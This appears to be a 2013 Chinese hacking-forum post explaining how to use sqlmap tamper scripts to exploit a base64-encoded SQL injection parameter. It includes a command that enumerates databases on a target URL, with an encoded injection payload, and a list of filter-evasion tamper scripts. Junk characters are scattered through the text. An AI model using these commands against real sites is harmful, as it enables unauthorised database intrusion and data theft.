WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
& |# ~8 X* b# I7 r- U) Z
. Z8 g( _: ?/ Fsqlmap的tamper里有个base64encode.py
5 o6 u& y# C$ v6 v9 V# N0 [# F6 r! i2 {+ W/ Q" h/ [$ y
使用如下
" `6 q2 v$ C8 `; g2 k" v2 ]$ l; y( `+ [: x; w
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs7 Z7 J' q2 |( e/ n; j, `
" C5 B5 l/ o! l: S2 S$ s
: s% t. s. X2 s* s* F
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”7 t" o& f7 U2 V" A+ M! a/ A
& x+ ^% `: J% [4 ^2 p" D Z- h
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
3 x& q8 h% ]5 P. B) y7 O, L4 ^# H" P; c0 _# L
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
+ }# \1 o0 c7 X, J2 x" Wspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入" T; f7 V' ]* @* a& ~
首先确定目标数据库版本,然后选择相应的脚本。4 K$ m1 d+ I0 g- O7 j, x
-v 3 --batch --tamper "space2hash.py"6 s" A2 ^: Q2 k
% L* c v4 g/ E还有其他一些插件:
; m/ D% Q# A9 X/ C6 kencodes编码 ——charencode.py
4 ]. T* u: O$ Lbase64编码 —— base64encode.py
% U4 ?/ ~' V3 f9 c3 i( L8 u替换空格和关键字 —— halfversionedmorekeywords.py) p* N4 f- Z8 Q. x l1 e% O
|
1 j7 O, I. v7 x6 l1 ^/ q' i, _ G4 g: c5 Z" M. O
3 X! [- u$ _% Q+ j% s" i! S* o8 \3 e; I* S$ A& `
|
发表于 2013-11-23 15:50:45
收藏
分享
支持
反对